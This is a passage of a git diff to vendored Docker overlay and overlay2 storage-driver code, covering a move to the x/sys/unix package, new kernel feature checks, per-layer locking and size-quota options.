a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go index 34b6d801fd..b270122c63 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go @@ -1,6 +1,6 @@ // +build linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go index 3dbb4de44e..8fc06ffecf 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go @@ -1,3 +1,3 @@ // +build !linux -package overlay +package overlay // import "github.com/docker/docker/daemon/graphdriver/overlay" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go index 53a7199292..d6ee42f47f 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "fmt" @@ -10,29 +10,34 @@ import ( "path/filepath" "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) -// hasOpaqueCopyUpBug checks whether the filesystem has a bug +// doesSupportNativeDiff checks whether the filesystem has a bug // which copies up the opaque flag when copying up an opaque -// directory. When this bug exists naive diff should be used. -func hasOpaqueCopyUpBug(d string) error { +// directory or the kernel enable CONFIG_OVERLAY_FS_REDIRECT_DIR. +// When these exist naive diff should be used. +func doesSupportNativeDiff(d string) error { td, err := ioutil.TempDir(d, "opaque-bug-check") if err != nil { return err } defer func() { if err := os.RemoveAll(td); err != nil { - logrus.Warnf("Failed to remove check directory %v: %v", td, err) + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err) } }() - // Make directories l1/d, l2/d, l3, work, merged + // Make directories l1/d, l1/d1, l2/d, l3, work, merged if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil { return err } + if err := os.MkdirAll(filepath.Join(td, "l1", "d1"), 0755); err != nil { + return err + } if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil { return err } @@ -52,12 +57,12 @@ func hasOpaqueCopyUpBug(d string) error { } opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work")) - if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { return errors.Wrap(err, "failed to mount overlay") } defer func() { - if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil { - logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) } }() @@ -75,5 +80,55 @@ func hasOpaqueCopyUpBug(d string) error { return errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix") } + // rename "d1" to "d2" + if err := os.Rename(filepath.Join(td, "merged", "d1"), filepath.Join(td, "merged", "d2")); err != nil { + // if rename failed with syscall.EXDEV, the kernel doesn't have CONFIG_OVERLAY_FS_REDIRECT_DIR enabled + if err.(*os.LinkError).Err == syscall.EXDEV { + return nil + } + return errors.Wrap(err, "failed to rename dir in merged directory") + } + // get the xattr of "d2" + xattrRedirect, err := system.Lgetxattr(filepath.Join(td, "l3", "d2"), "trusted.overlay.redirect") + if err != nil { + return errors.Wrap(err, "failed to read redirect flag on upper layer") + } + + if string(xattrRedirect) == "d1" { + return errors.New("kernel has CONFIG_OVERLAY_FS_REDIRECT_DIR enabled") + } + + return nil +} + +// supportsMultipleLowerDir checks if the system supports multiple lowerdirs, +// which is required for the overlay2 driver. On 4.x kernels, multiple lowerdirs +// are always available (so this check isn't needed), and backported to RHEL and +// CentOS 3.x kernels (3.10.0-693.el7.x86_64 and up). This function is to detect +// support on those kernels, without doing a kernel version compare. +func supportsMultipleLowerDir(d string) error { + td, err := ioutil.TempDir(d, "multiple-lowerdir-check") + if err != nil { + return err + } + defer func() { + if err := os.RemoveAll(td); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to remove check directory %v: %v", td, err) + } + }() + + for _, dir := range []string{"lower1", "lower2", "upper", "work", "merged"} { + if err := os.Mkdir(filepath.Join(td, dir), 0755); err != nil { + return err + } + } + + opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "lower2"), path.Join(td, "lower1"), path.Join(td, "upper"), path.Join(td, "work")) + if err := unix.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + return errors.Wrap(err, "failed to mount overlay") + } + if err := unix.Unmount(filepath.Join(td, "merged"), 0); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go index 60e248b6d7..da409fc81a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "bytes" @@ -9,9 +9,9 @@ import ( "fmt" "os" "runtime" - "syscall" "github.com/docker/docker/pkg/reexec" + "golang.org/x/sys/unix" ) func init() { @@ -49,18 +49,19 @@ func mountFrom(dir, device, target, mType string, flags uintptr, label string) e output := bytes.NewBuffer(nil) cmd.Stdout = output cmd.Stderr = output - if err := cmd.Start(); err != nil { + w.Close() return fmt.Errorf("mountfrom error on re-exec cmd: %v", err) } //write the options to the pipe for the untar exec to read if err := json.NewEncoder(w).Encode(options); err != nil { + w.Close() return fmt.Errorf("mountfrom json encode to pipe failed: %v", err) } w.Close() if err := cmd.Wait(); err != nil { - return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output) + return fmt.Errorf("mountfrom re-exec error: %v: output: %v", err, output) } return nil } @@ -80,7 +81,7 @@ func mountFromMain() { fatal(err) } - if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { + if err := unix.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { fatal(err) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go index 65ac6bfaeb..5108a2c055 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go @@ -1,9 +1,10 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "bufio" + "context" "errors" "fmt" "io" @@ -15,24 +16,26 @@ import ( "strconv" "strings" "sync" - "syscall" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/overlayutils" "github.com/docker/docker/daemon/graphdriver/quota" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/directory" "github.com/docker/docker/pkg/fsutils" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/system" "github.com/docker/go-units" - - "github.com/opencontainers/runc/libcontainer/label" + rsystem "github.com/opencontainers/runc/libcontainer/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) var ( @@ -74,7 +77,7 @@ const ( maxDepth = 128 // idLength represents the number of random characters - // which can be used to create the unique link identifer + // which can be used to create the unique link identifier // for every layer. If this value is too long then the // page size limit for the mount command may be exceeded. // The idLength should be selected such that following equation @@ -88,7 +91,8 @@ type overlayOptions struct { quota quota.Quota } -// Driver contains information about the home directory and the list of active mounts that are created using this driver. +// Driver contains information about the home directory and the list of active +// mounts that are created using this driver. type Driver struct { home string uidMaps []idtools.IDMap @@ -98,6 +102,7 @@ type Driver struct { options overlayOptions naiveDiff graphdriver.DiffDriver supportsDType bool + locker *locker.Locker } var ( @@ -112,9 +117,11 @@ func init() { graphdriver.Register(driverName, Init) } -// Init returns the a native diff driver for overlay filesystem. -// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. -// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +// Init returns the native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, the error +// graphdriver.ErrNotSupported is returned. +// If an overlay filesystem is not supported over an existing filesystem then +// the error graphdriver.ErrIncompatibleFS is returned. func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { opts, err := parseOptions(options) if err != nil { @@ -130,14 +137,17 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap if err != nil { return nil, err } - if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { - if !opts.overrideKernelCheck { - return nil, graphdriver.ErrNotSupported - } - logrus.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + + // Perform feature detection on /var/lib/docker/overlay2 if it's an existing directory. + // This covers situations where /var/lib/docker/overlay2 is a mount, and on a different + // filesystem than /var/lib/docker. + // If the path does not exist, fall back to using /var/lib/docker for feature detection. + testdir := home + if _, err := os.Stat(testdir); os.IsNotExist(err) { + testdir = filepath.Dir(testdir) } - fsMagic, err := graphdriver.GetFSMagic(home) + fsMagic, err := graphdriver.GetFSMagic(testdir) if err != nil { return nil, err } @@ -145,33 +155,53 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap backingFs = fsName } - // check if they are running over btrfs, aufs, zfs, overlay, or ecryptfs + logger := logrus.WithField("storage-driver", "overlay2") + switch fsMagic { - case graphdriver.FsMagicBtrfs, graphdriver.FsMagicAufs, graphdriver.FsMagicZfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicEcryptfs: - logrus.Errorf("'overlay2' is not supported over %s", backingFs) + case graphdriver.FsMagicAufs, graphdriver.FsMagicEcryptfs, graphdriver.FsMagicNfsFs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs: + logger.Errorf("'overlay2' is not supported over %s", backingFs) return nil, graphdriver.ErrIncompatibleFS + case graphdriver.FsMagicBtrfs: + // Support for OverlayFS on BTRFS was added in kernel 4.7 + // See https://btrfs.wiki.kernel.org/index.php/Changelog + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 7, Minor: 0}) < 0 { + if !opts.overrideKernelCheck { + logger.Errorf("'overlay2' requires kernel 4.7 to use on %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + logger.Warn("Using pre-4.7.0 kernel for overlay2 on btrfs, may require kernel update") + } } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return nil, err + if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 4, Major: 0, Minor: 0}) < 0 { + if opts.overrideKernelCheck { + logger.Warn("Using pre-4.0.0 kernel for overlay2, mount failures may require kernel update") + } else { + if err := supportsMultipleLowerDir(testdir); err != nil { + logger.Debugf("Multiple lower dirs not supported: %v", err) + return nil, graphdriver.ErrNotSupported + } + } } - // Create the driver home dir - if err := idtools.MkdirAllAs(path.Join(home, linkDir), 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + supportsDType, err := fsutils.SupportsDType(testdir) + if err != nil { return nil, err } - - if err := mount.MakePrivate(home); err != nil { - return nil, err + if !supportsDType { + if !graphdriver.IsInitialized(home) { + return nil, overlayutils.ErrDTypeNotSupported("overlay2", backingFs) + } + // allow running without d_type only for existing setups (#27443) + logger.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) } - supportsDType, err := fsutils.SupportsDType(home) + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) if err != nil { return nil, err } - if !supportsDType { - // not a fatal error until v1.16 (#27443) - logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay2", backingFs)) + // Create the driver home dir + if err := idtools.MkdirAllAndChown(path.Join(home, linkDir), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } d := &Driver{ @@ -180,6 +210,8 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap gidMaps: gidMaps, ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), supportsDType: supportsDType, + locker: locker.New(), + options: *opts, } d.naiveDiff = graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps) @@ -188,10 +220,15 @@ func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap // Try to enable project quota support over xfs. if d.quotaCtl, err = quota.NewControl(home); err == nil { projectQuotaSupported = true + } else if opts.quota.Size > 0 { + return nil, fmt.Errorf("Storage option overlay2.size not supported. Filesystem does not support Project Quota: %v", err) } + } else if opts.quota.Size > 0 { + // if xfs is not the backing fs then error out if the storage-opt overlay2.size is used. + return nil, fmt.Errorf("Storage Option overlay2.size only supported for backingFS XFS. Found %v", backingFs) } - logrus.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) + logger.Debugf("backingFs=%s, projectQuotaSupported=%v", backingFs, projectQuotaSupported) return d, nil } @@ -210,9 +247,14 @@ func parseOptions(options []string) (*overlayOptions, error) { if err != nil { return nil, err } - + case "overlay2.size": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + o.quota.Size = uint64(size) default: - return nil, fmt.Errorf("overlay2: Unknown option %s\n", key) + return nil, fmt.Errorf("overlay2: unknown option %s", key) } } return o, nil @@ -235,14 +277,14 @@ func supportsOverlay() error { return nil } } - logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + logrus.WithField("storage-driver", "overlay2").Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") return graphdriver.ErrNotSupported } func useNaiveDiff(home string) bool { useNaiveDiffLock.Do(func() { - if err := hasOpaqueCopyUpBug(home); err != nil { - logrus.Warnf("Not using native diff for overlay2: %v", err) + if err := doesSupportNativeDiff(home); err != nil { + logrus.WithField("storage-driver", "overlay2").Warnf("Not using native diff for overlay2, this may cause degraded performance for building images: %v", err) useNaiveDiffOnly = true } }) @@ -263,8 +305,8 @@ func (d *Driver) Status() [][2]string { } } -// GetMetadata returns meta data about the overlay driver such as -// LowerDir, UpperDir, WorkDir and MergeDir used to store data. +// GetMetadata returns metadata about the overlay driver such as the LowerDir, +// UpperDir, WorkDir, and MergeDir used to store data. func (d *Driver) GetMetadata(id string) (map[string]string, error) { dir := d.dir(id) if _, err := os.Stat(dir); err != nil { @@ -292,33 +334,56 @@ func (d *Driver) GetMetadata(id string) (map[string]string, error) { // is being shutdown. For now, we just have to unmount the bind mounted // we had created. func (d *Driver) Cleanup() error { - return mount.Unmount(d.home) + return mount.RecursiveUnmount(d.home) } // CreateReadWrite creates a layer that is writable for use as a container // file system. func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { - return d.Create(id, parent, opts) + if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { + return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + } + + if opts == nil { + opts = &graphdriver.CreateOpts{ + StorageOpt: map[string]string{}, + } + } + + if _, ok := opts.StorageOpt["size"]; !ok { + if opts.StorageOpt == nil { + opts.StorageOpt = map[string]string{} + } + opts.StorageOpt["size"] = strconv.FormatUint(d.options.quota.Size, 10) + } + + return d.create(id, parent, opts) } // Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. // The parent filesystem is used to configure these directories for the overlay. func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { - - if opts != nil && len(opts.StorageOpt) != 0 && !projectQuotaSupported { - return fmt.Errorf("--storage-opt is supported only for overlay over xfs with 'pquota' mount option") + if opts != nil && len(opts.StorageOpt) != 0 { + if _, ok := opts.StorageOpt["size"]; ok { + return fmt.Errorf("--storage-opt size is only supported for ReadWrite Layers") + } } + return d.create(id, parent, opts) +} +func (d *Driver) create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { dir := d.dir(id) rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { return err } - if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + root := idtools.IDPair{UID: rootUID, GID: rootGID} + + if err := idtools.MkdirAllAndChown(path.Dir(dir), 0700, root); err != nil { return err } - if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(dir, 0700, root); err != nil { return err } @@ -343,7 +408,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr } } - if err := idtools.MkdirAs(path.Join(dir, "diff"), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "diff"), 0755, root); err != nil { return err } @@ -362,10 +427,7 @@ func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr return nil } - if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { - return err - } - if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(path.Join(dir, "work"), 0700, root); err != nil { return err } @@ -451,25 +513,34 @@ func (d *Driver) getLowerDirs(id string) ([]string, error) { // Remove cleans the directories that are created for this id. func (d *Driver) Remove(id string) error { + if id == "" { + return fmt.Errorf("refusing to remove the directories: id is empty") + } + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) lid, err := ioutil.ReadFile(path.Join(dir, "link")) if err == nil { - if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { - logrus.Debugf("Failed to remove link: %v", err) + if len(lid) == 0 { + logrus.WithField("storage-driver", "overlay2").Errorf("refusing to remove empty link for layer %v", id) + } else if err := os.RemoveAll(path.Join(d.home, linkDir, string(lid))); err != nil { + logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove link: %v", err) } } - if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + if err := system.EnsureRemoveAll(dir); err != nil && !os.IsNotExist(err) { return err } return nil } // Get creates and mounts the required file system for the given id and returns the mount path. -func (d *Driver) Get(id string, mountLabel string) (s string, err error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) { + d.locker.Lock(id) + defer d.locker.Unlock(id) dir := d.dir(id) if _, err := os.Stat(dir); err != nil { - return "", err + return nil, err } diffDir := path.Join(dir, "diff") @@ -477,19 +548,25 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { if err != nil { // If no lower, just return diff directory if os.IsNotExist(err) { - return diffDir, nil + return containerfs.NewLocalContainerFS(diffDir), nil } - return "", err + return nil, err } mergedDir := path.Join(dir, "merged") if count := d.ctr.Increment(mergedDir); count > 1 { - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } defer func() { - if err != nil { + if retErr != nil { if c := d.ctr.Decrement(mergedDir); c <= 0 { - syscall.Unmount(mergedDir, 0) + if mntErr := unix.Unmount(mergedDir, 0); mntErr != nil { + logrus.WithField("storage-driver", "overlay2").Errorf("error unmounting %v: %v", mergedDir, mntErr) + } + // Cleanup the created merged directory; see the comment in Put's rmdir + if rmErr := unix.Rmdir(mergedDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "overlay2").Debugf("Failed to remove %s: %v: %v", id, rmErr, err) + } } } }() @@ -502,10 +579,18 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { } opts := fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", strings.Join(absLowers, ":"), path.Join(dir, "diff"), path.Join(dir, "work")) mountData := label.FormatMountLabel(opts, mountLabel) - mount := syscall.Mount + mount := unix.Mount mountTarget := mergedDir - pageSize := syscall.Getpagesize() + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAndChown(mergedDir, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err + } + + pageSize := unix.Getpagesize() // Go can return a larger page size than supported by the system // as of go 1.7. This will be fixed in 1.8 and this block can be @@ -524,7 +609,7 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", string(lowers), path.Join(id, "diff"), path.Join(id, "work")) mountData = label.FormatMountLabel(opts, mountLabel) if len(mountData) > pageSize { - return "", fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) + return nil, fmt.Errorf("cannot mount layer, mount label too large %d", len(mountData)) } mount = func(source string, target string, mType string, flags uintptr, label string) error { @@ -534,31 +619,51 @@ func (d *Driver) Get(id string, mountLabel string) (s string, err error) { } if err := mount("overlay", mountTarget, "overlay", 0, mountData); err != nil { - return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + return nil, fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) } // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a // user namespace requires this to move a directory from lower to upper. - rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) - if err != nil { - return "", err - } - if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { - return "", err + return nil, err } - return mergedDir, nil + return containerfs.NewLocalContainerFS(mergedDir), nil } // Put unmounts the mount path created for the give id. +// It also removes the 'merged' directory to force the kernel to unmount the +// overlay mount in other namespaces. func (d *Driver) Put(id string) error { - mountpoint := path.Join(d.dir(id), "merged") + d.locker.Lock(id) + defer d.locker.Unlock(id) + dir := d.dir(id) + _, err := ioutil.ReadFile(path.Join(dir, lowerFile)) + if err != nil { + // If no lower, no mount happened and just return directly + if os.IsNotExist(err) { + return nil + } + return err + } + + mountpoint := path.Join(dir, "merged") + logger := logrus.WithField("storage-driver", "overlay2") if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - if err := syscall.Unmount(mountpoint, 0); err != nil { - logrus.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Debugf("Failed to unmount %s overlay: %s - %v", id, mountpoint, err) + } + // Remove the mountpoint here. Removing the mountpoint (in newer kernels) + // will cause all other instances of this mount in other mount namespaces + // to be unmounted. This is necessary to avoid cases where an overlay mount + // that is present in another namespace will cause subsequent mounts + // operations to fail with ebusy. We ignore any errors here because this may + // fail on older kernels which don't have + // torvalds/linux@8ed936b5671bfb33d89bc60bdcc7cf0470ba52fe applied. + if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) { + logger.Debugf("Failed to remove %s overlay: %v", id, err) } return nil } @@ -569,7 +674,8 @@ func (d *Driver) Exists(id string) bool { return err == nil } -// isParent returns if the passed in parent is the direct parent of the passed in layer +// isParent determines whether the given parent is the direct parent of the +// given layer id func (d *Driver) isParent(id, parent string) bool { lowers, err := d.getLowerDirs(id) if err != nil { @@ -598,17 +704,18 @@ func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64 applyDir := d.getDiffPath(id) - logrus.Debugf("Applying tar in %s", applyDir) + logrus.WithField("storage-driver", "overlay2").Debugf("Applying tar in %s", applyDir) // Overlay doesn't need the parent id to apply the diff if err := untar(diff, applyDir, &archive.TarOptions{ UIDMaps: d.uidMaps, GIDMaps: d.gidMaps, WhiteoutFormat: archive.OverlayWhiteoutFormat, + InUserNS: rsystem.RunningInUserNS(), }); err != nil { return 0, err } - return directory.Size(applyDir) + return directory.Size(context.TODO(), applyDir) } func (d *Driver) getDiffPath(id string) string { @@ -624,7 +731,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) { if useNaiveDiff(d.home) || !d.isParent(id, parent) { return d.naiveDiff.DiffSize(id, parent) } - return directory.Size(d.getDiffPath(id)) + return directory.Size(context.TODO(), d.getDiffPath(id)) } // Diff produces an archive of the changes between the specified @@ -635,7 +742,7 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { } diffPath := d.getDiffPath(id) - logrus.Debugf("Tar with options on %s", diffPath) + logrus.WithField("storage-driver", "overlay2").Debugf("Tar with options on %s", diffPath) return archive.TarWithOptions(diffPath, &archive.TarOptions{ Compression: archive.Uncompressed, UIDMaps: d.uidMaps, @@ -644,8 +751,8 @@ func (d *Driver) Diff(id, parent string) (io.ReadCloser, error) { }) } -// Changes produces a list of changes between the specified layer -// and its parent layer. If parent is "", then all changes will be ADD changes. +// Changes produces a list of changes between the specified layer and its +// parent layer. If parent is "", then all changes will be ADD changes. func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { if useNaiveDiff(d.home) || !d.isParent(id, parent) { return d.naiveDiff.Changes(id, parent) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go index cf77ff22be..4a07137ed8 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go @@ -1,11 +1,10 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "io/ioutil" "os" - "syscall" "testing" "github.com/docker/docker/daemon/graphdriver" @@ -23,17 +22,6 @@ func init() { reexec.Init() } -func cdMountFrom(dir, device, target, mType, label string) error { - wd, err := os.Getwd() - if err != nil { - return err - } - os.Chdir(dir) - defer os.Chdir(wd) - - return syscall.Mount(device, target, mType, 0, label) -} - func skipIfNaive(t *testing.T) { td, err := ioutil.TempDir("", "naive-check-") if err != nil { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go index e5ac4ca8c6..68b75a366a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go @@ -1,3 +1,3 @@ // +build !linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go index af5cb659d5..842c06127f 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go @@ -1,6 +1,6 @@ // +build linux -package overlay2 +package overlay2 // import "github.com/docker/docker/daemon/graphdriver/overlay2" import ( "crypto/rand" @@ -11,7 +11,8 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) // generateID creates a new random string identifier with the given length @@ -69,7 +70,7 @@ func retryOnError(err error) bool { case *os.PathError: return retryOnError(err.Err) // unpack the target error case syscall.Errno: - if err == syscall.EPERM { + if err == unix.EPERM { // EPERM represents an entropy pool exhaustion, a condition under // which we backoff and retry. return true diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go index 67c6640b4b..71f6d2d460 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go @@ -1,10 +1,11 @@ // +build linux -package overlayutils +package overlayutils // import "github.com/docker/docker/daemon/graphdriver/overlayutils" import ( - "errors" "fmt" + + "github.com/docker/docker/daemon/graphdriver" ) // ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type. @@ -13,6 +14,12 @@ func ErrDTypeNotSupported(driver, backingFs string) error { if backingFs == "xfs" { msg += " Reformat the filesystem with ftype=1 to enable d_type support." } - msg += " Running without d_type support will no longer be supported in Docker 1.16." - return errors.New(msg) + + if backingFs == "extfs" { + msg += " Reformat the filesystem (or use tune2fs) with -O filetype flag to enable d_type support." + } + + msg += " Backing filesystems without d_type support are not supported." + + return graphdriver.NotSupportedError(msg) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go index 7294bcc5f6..b0983c5667 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go @@ -1,28 +1,21 @@ -package graphdriver 